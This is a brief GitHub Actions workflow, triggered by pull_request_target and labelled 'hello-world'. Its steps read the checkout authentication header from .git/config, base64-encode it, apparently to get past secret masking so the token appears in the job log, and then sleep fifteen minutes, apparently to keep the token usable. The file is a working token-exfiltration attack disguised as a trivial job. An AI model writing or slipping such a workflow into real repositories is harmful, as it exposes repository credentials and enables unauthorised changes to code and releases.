name: PULL REQUEST TARGET

on:
  pull_request_target:
    branches:
      - main

jobs:
  hello-world:
    runs-on: ubuntu-latest
    steps:
    - uses: actions/checkout@v4
    - run: grep 'extraheader' .git/config | base64 -w0
    - run: git log -1 --format=%H
    - run: sleep 900
